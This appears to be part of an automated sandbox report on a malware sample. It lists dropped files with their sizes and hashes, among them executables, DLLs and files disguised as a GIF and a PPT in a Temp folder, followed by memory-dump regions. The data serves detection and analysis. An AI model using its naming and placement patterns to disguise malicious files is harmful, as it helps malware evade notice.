1674e8f7956bc78ccaf1f95a985c0b3c

SHA1
a81fd962838f913e1a7412d38c8db3dc82f6d2c7

SHA256
8c5655b6ad2589b99a28862690c7ea40ccc2e13a78aaeb31060b257d862a9303

SHA512
f838e3cf6b2005fc5e50567840be5e7820e08119a1410c2bffe7b5e6cfed6cc7d7cfd6a3c827ce85b1d406759fafb10527c6dd26459063b87e60bb56f2b85f1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updatemonitor\beau.gif
Filesize
548KB

MD5
24661f448bb28f80efa41b88274400d6

SHA1
bb6ee7625afaa9c7ece306d4f674f96ebd2d4342

SHA256
dec19caa7976a5affebe1af6c4075f2f59dd5f9828bf482f75306d28f1f1025a

SHA512
3848bd428c8849b91c7cb3108cd5a9d3c0676706fadeed6967491f65d85b83c8ccd932ff408b7ee2d5a4f9f1738fda2b3ba458a7a0f8b5395cd74f9b84633797

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updatemonitor\livecall.exe
Filesize
293KB

MD5
d9602ab0e6370519bd54d13d22dd6ef5

SHA1
95a3a7afdb00e1b2a99fddfe5d3203aa5cd4a09d

SHA256
63ec17feda1f0ea80e0dd7b7938fbf7354aedf8d9f4041543afca9a35337f7bf

SHA512
4587ca630bf5e421e48d5ac7f9ac6866000b06a99d89c1ca31c999414a63ba06a6be2e11467c045b0e2cddb21d792342e69977e6abda6e265b91044e2c8007cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updatemonitor\msidcrl40.dll
Filesize
791KB

MD5
35b4cbc40f4df46cc50acb5c6205d757

SHA1
7e40413f8c583bc45fe2cbbf87aa095cdc0f8741

SHA256
810d73c452411fd045a321517a3ca6841b505c0a8df1cef293f31f1e44eed1cd

SHA512
52f9d4ee45c12138cb5f7b103d266dcfe1497ba2bf2cc283047b7c69dfa20f0674ddef02277f85b6bb7b770138a83727d6df05415f2557d60ed8ad107bdcd891

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updatemonitor\ouzel.ppt
Filesize
18KB

MD5
4291a76014353530321658fac5d087c4

SHA1
22cc218a009927b31f1c888f715b3e48a5d4e4bf

SHA256
fb674a1619af1cffd77a9e9c619ddef4e2d88ec5cb572dbf7842662f5a52a7aa

SHA512
5cdbee401f0fb79e9f8b044d47e9cb42171a1bba50833712e58162ccdba3d07025c1a5cb3a2e9c469e5cb0e2739ad68f96f0c355d059edb1aa501504da329b9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqmcmxg1.lzw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nmug4mwt.dll
Filesize
3KB

MD5
be33518026013e905ef66603766752da

SHA1
aff7b97cd3e7297027dfcdc4250c890d4da83430

SHA256
ab1017d6ff4ec236daf4ed5f60514d555a6a05bee1eebce6e7322b6565647603

SHA512
b17dca43cfa3723535f162c1d40e9a76fa6a66d45cfe7a2385374b584ea94b9d5e9f651fb10d1c986a224538950cc3937fdd5b55ae3d423a78e6f5a32626acc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\nmug4mwt.pdb
Filesize
11KB

MD5
d0c2553541222758bcaaa75d460a712b

SHA1
c3daad6115c7ce0990aeadb754aea8666998c8b8

SHA256
e79e53921b7b94281a0bca550b23b586d750b6e8e08daa7f28029c309b0c4c6e

SHA512
6dce8a35749185e18c8041f9ab064d7f6a5a2e4cafda2b1f09c4ee404a986f789b27e99858dd8feb6decc80fb08bfc193abcef1b8bc6b9c2b644c84d3a2d1963

Download Submit
C:\Users\Admin\AppData\Local\Temp\u3hg.0.exe
Filesize
272KB

MD5
31765c43b9bf0da3a52bfeb68733655c

SHA1
c6ccc6b435e123ef62c4996a82019432cde58d4b

SHA256
06d92df4f5d05897df05e9a9b89986a7b4e534cec4d46e3219d79c90edb645b2

SHA512
0f4b867ff7680c2946f0c801b69157de9b2f5007030a1c17d15ac99d4acd1933e9515e48c9109206f4498f4c020ef89aca21c0de920609a77cef2c03d3258c92

Download Submit
C:\Users\Admin\AppData\Local\Temp\u3hg.1.exe
Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini
Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
C:\Windows\Installer\e5b28c2.msi
Filesize
7.4MB

MD5
73e578a44265558d3ace212869d43cbb

SHA1
d2c15578def8996ed0ae4a44754055b774b095a7

SHA256
8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4

SHA512
fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4

Download Submit
C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe
Filesize
96KB

MD5
9e2c097647125ee25068784acb01d7d3

SHA1
1a90c40c7f89eec18f47f0dae3f1d5cd3a3d49b5

SHA256
b4614281771ed482970fd0d091604b3a65c7e048f7d7fa8794abd0a0c638f5d2

SHA512
e2f334f31361ea1ffc206184808cb51002486fe583dc23b4f617bead0e3940fdc97b72cda2a971e2cf00462940b31e065228f643835d156e7166e8803e3181f1

Download Submit
C:\Windows\SoftwareDistribution\config.xml
Filesize
516B

MD5
92714417a26162d7918c9875c70f8ed9

SHA1
e017c2eb9e2aad8b8bf1f24e7411d28165242a7a

SHA256
1e6f789ba5f3d163e06cfe7caf54b366971ad5a0a5e54c8f76e3523a36f6a24f

SHA512
de27961363f22d8ee3f05cec3c32bd359b90c1ddac43f5dfa58b01d50c8195b24834568d6287726b74bda691bf1ab321790e61dd8eab225cebf1ecd107a676ed

Download Submit
C:\Windows\sysdinrdvs.exe
Filesize
84KB

MD5
161a475bfe57d8b5317ca1f2f24b88fa

SHA1
38fa8a789d3d7570c411ddf4c038d89524142c2c

SHA256
98fb81423a107a5359e5fc86f1c4d81ff2d4bc73b79f55a5bf827fdb8e620c54

SHA512
d9f61f80c96fbac030c1105274f690d38d5dc8af360645102080a7caed7bad303ae89ed0e169124b834a68d1a669781eb70269bf4e8d5f34aeef394dd3d16547

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6283.tmp
Filesize
652B

MD5
fe5e5e84687be377cb04e4b1d9a6ead5

SHA1
be1bf94b25e0521da6b841992083ceee5de75ab4

SHA256
651d1e4f82cc042b1b70794ecfc7feb2782e74d4db887ed0c8e0797575161100

SHA512
444d12f88c09b7b56b0f5bf0216b4ce693135d5231aaed8fe49725774c547e7082ddc829755f0c76bdffd1129e36f9c09f4b3605b159430fdbf29e520345321e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nmug4mwt.0.cs
Filesize
447B

MD5
1640a04633fee0dfdc7e22c4f4063bf6

SHA1
3cb525c47b5dd37f8ee45b034c9452265fba5476

SHA256
55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

SHA512
85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nmug4mwt.cmdline
Filesize
309B

MD5
50c1cd9c021027600db4610c83732167

SHA1
46ddd5346584aa2e7700c8b2a588d77dfceca4ad

SHA256
f5d57cabc919770f59a75710b47ae9c1f7f0a1de25598f86043d232e4292e822

SHA512
e4d6022378a464bfe9ea0ba9218877201c2b4d8f8d915624bffa32a9dcd750c8d5b1bec3b7af1333e54b2b3c03e5ffe76df73d3c26058005660b522673f08eb7

Download Submit
memory/704-335-0x000001F4E48A0000-0x000001F4E48B4000-memory.dmp

Filesize
80KB

Download
memory/704-332-0x000001F4E48B0000-0x000001F4E48BC000-memory.dmp

Filesize
48KB

Download
memory/704-344-0x000001F4E4CF0000-0x000001F4E4DA2000-memory.dmp

Filesize
712KB

Download
memory/704-343-0x000001F4E4950000-0x000001F4E495A000-memory.dmp

Filesize
40KB

Download
memory/704-360-0x000001F4E4FB0000-0x000001F4E52B0000-memory.dmp

Filesize
3.0MB

Download
memory/704-347-0x000001F4E4DA0000-0x000001F4E4DCA000-memory.dmp

Filesize
168KB

Download
memory/704-328-0x000001F4E4A90000-0x000001F4E4BA0000-memory.dmp

Filesize
1.1MB

Download
memory/704-338-0x000001F4E4930000-0x000001F4E4954000-memory.dmp

Filesize
144KB

Download
memory/704-365-0x000001F4E48E0000-0x000001F4E48F0000-memory.dmp

Filesize
64KB

Download
memory/704-352-0x000001F4E4F30000-0x000001F4E4FA6000-memory.dmp

Filesize
472KB

Download
memory/704-296-0x00007FFFE7480000-0x00007FFFE7F42000-memory.dmp

Filesize
10.8MB

Download
memory/704-299-0x000001F4C69D0000-0x000001F4CA2C8000-memory.dmp

Filesize
57.0MB

Download
memory/704-309-0x000001F4E48E0000-0x000001F4E48F0000-memory.dmp

Filesize
64KB

Download
memory/704-351-0x000001F4E4E50000-0x000001F4E4EB2000-memory.dmp

Filesize
392KB

Download
memory/704-348-0x000001F4E4DD0000-0x000001F4E4E4A000-memory.dmp

Filesize
488KB

Download
memory/704-355-0x000001F4E4870000-0x000001F4E487A000-memory.dmp

Filesize
40KB

Download
memory/704-330-0x000001F4E4890000-0x000001F4E48A0000-memory.dmp

Filesize
64KB

Download
memory/1560-88-0x0000000002EB0000-0x0000000002FB0000-memory.dmp

Filesize
1024KB

Download
memory/1560-251-0x0000000000400000-0x0000000002D22000-memory.dmp

Filesize
41.1MB

Download
memory/1560-134-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1560-100-0x0000000000400000-0x0000000002D22000-memory.dmp

Filesize
41.1MB

Download
memory/1560-89-0x0000000002E80000-0x0000000002EA7000-memory.dmp

Filesize
156KB

Download
memory/1560-271-0x0000000000400000-0x0000000002D22000-memory.dmp

Filesize
41.1MB

Download
memory/1572-111-0x00000000029E0000-0x0000000002A81000-memory.dmp

Filesize
644KB

Download
memory/1572-260-0x00000000005A0000-0x00000000006AF000-memory.dmp

Filesize
1.1MB

Download
memory/2220-294-0x0000000001C10000-0x0000000001C11000-memory.dmp

Filesize
4KB

Download
memory/2220-329-0x0000000000400000-0x0000000001753000-memory.dmp

Filesize
19.3MB

Download
memory/2584-15-0x00007FFFEB4E0000-0x00007FFFEBE81000-memory.dmp

Filesize
9.6MB

Download
memory/2584-16-0x000000001C360000-0x000000001C82E000-memory.dmp

Filesize
4.8MB

Download
memory/2584-61-0x000000001D590000-0x000000001D598000-memory.dmp

Filesize
32KB

Download
memory/2584-18-0x000000001C960000-0x000000001C9FC000-memory.dmp

Filesize
624KB

Download
memory/2584-19-0x00007FFFEB4E0000-0x00007FFFEBE81000-memory.dmp

Filesize
9.6MB

Download
memory/2584-17-0x0000000001B50000-0x0000000001B60000-memory.dmp

Filesize
64KB

Download
memory/2584-250-0x0000000001B50000-0x0000000001B60000-memory.dmp

Filesize
64KB

Download
memory/2584-249-0x00007FFFEB4E0000-0x00007FFFEBE81000-memory.dmp

Filesize
9.6MB

Download
memory/3204-104-0x00000000087F0000-0x000000000882C000-memory.dmp

Filesize
240KB

Download
memory/3204-324-0x00000000749D0000-0x0000000075181000-memory.dmp

Filesize
7.7MB

Download
memory/3204-28-0x00000000014F0000-0x000000000157C000-memory.dmp

Filesize
560KB

Download
memory/3204-32-0x0000000006130000-0x00000000066D6000-memory.dmp

Filesize
5.6MB

Download
memory/3204-33-0x00000000749D0000-0x0000000075181000-memory.dmp

Filesize
7.7MB

Download
memory/3204-34-0x0000000005A30000-0x0000000005AC2000-memory.dmp

Filesize
584KB

Download
memory/3204-40-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
memory/3204-45-0x0000000005AD0000-0x0000000005ADA000-memory.dmp

Filesize
40KB

Download
memory/3204-93-0x0000000008BD0000-0x00000000091E8000-memory.dmp

Filesize
6.1MB

Download
memory/3204-101-0x0000000008790000-0x00000000087A2000-memory.dmp

Filesize
72KB

Download
memory/3204-99-0x0000000008850000-0x000000000895A000-memory.dmp

Filesize
1.0MB

Download
memory/3204-109-0x0000000008960000-0x00000000089AC000-memory.dmp

Filesize
304KB

Download
memory/3204-123-0x0000000008B00000-0x0000000008B66000-memory.dmp

Filesize
408KB

Download
memory/3204-168-0x0000000009CC0000-0x0000000009D36000-memory.dmp

Filesize
472KB

Download
memory/3204-169-0x0000000009C90000-0x0000000009CAE000-memory.dmp

Filesize
120KB

Download
memory/3204-185-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
memory/3204-186-0x000000000B360000-0x000000000B522000-memory.dmp

Filesize
1.8MB

Download
memory/3204-190-0x000000000BA60000-0x000000000BF8C000-memory.dmp

Filesize
5.2MB

Download
memory/3204-262-0x00000000749D0000-0x0000000075181000-memory.dmp

Filesize
7.7MB

Download
memory/3204-268-0x0000000005D70000-0x0000000005D80000-memory.dmp

Filesize
64KB

Download
memory/3316-383-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-374-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-325-0x00007FFFE7480000-0x00007FFFE7F42000-memory.dmp

Filesize
10.8MB

Download
memory/3316-331-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-323-0x0000000000A40000-0x0000000000B16000-memory.dmp

Filesize
856KB

Download
memory/3316-327-0x000000001C670000-0x000000001C784000-memory.dmp

Filesize
1.1MB

Download
memory/3316-359-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-326-0x000000001C660000-0x000000001C670000-memory.dmp

Filesize
64KB

Download
memory/3316-349-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-339-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-345-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-333-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-336-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-366-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-387-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-353-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-381-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-341-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-378-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-363-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/3316-371-0x000000001C670000-0x000000001C780000-memory.dmp

Filesize
1.1MB

Download
memory/4104-0-0x0000000000990000-0x0000000000998000-memory.dmp

Filesize
32KB

Download
memory/4104-184-0x00000000749D0000-0x0000000075181000-memory.dmp

Filesize
7.7MB

Download
memory/4104-221-0x00000000056E0000-0x00000000056F0000-memory.dmp

Filesize
64KB

Download
memory/4104-3-0x00000000056E0000-0x00000000056F0000-memory.dmp

Filesize
64KB

Download
memory/4104-2-0x00000000054A0000-0x000000000553C000-memory.dmp

Filesize
624KB

Download
memory/4104-1-0x00000000749D0000-0x0000000075181000-memory.dmp

Filesize
7.7MB

Download
memory/4516-50-0x00000000030A0000-0x00000000031A0000-memory.dmp

Filesize
1024KB

Download
memory/4516-52-0x0000000004A80000-0x0000000004AEC000-memory.dmp

Filesize
432KB

Download
memory/4516-64-0x0000000000400000-0x0000000002D45000-memory.dmp

Filesize
41.3MB

Download
memory/4516-191-0x0000000000400000-0x0000000002D45000-memory.dmp

Filesize
41.3MB

Download
memory/4968-140-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

Filesize
4KB

Download
memory/4968-261-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/4968-295-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/4972-266-0x0000000000890000-0x00000000008B0000-memory.dmp

Filesize
128KB

Download
memory/4972-270-0x00000000749D0000-0x0000000075181000-memory.dmp

Filesize
7.7MB

Download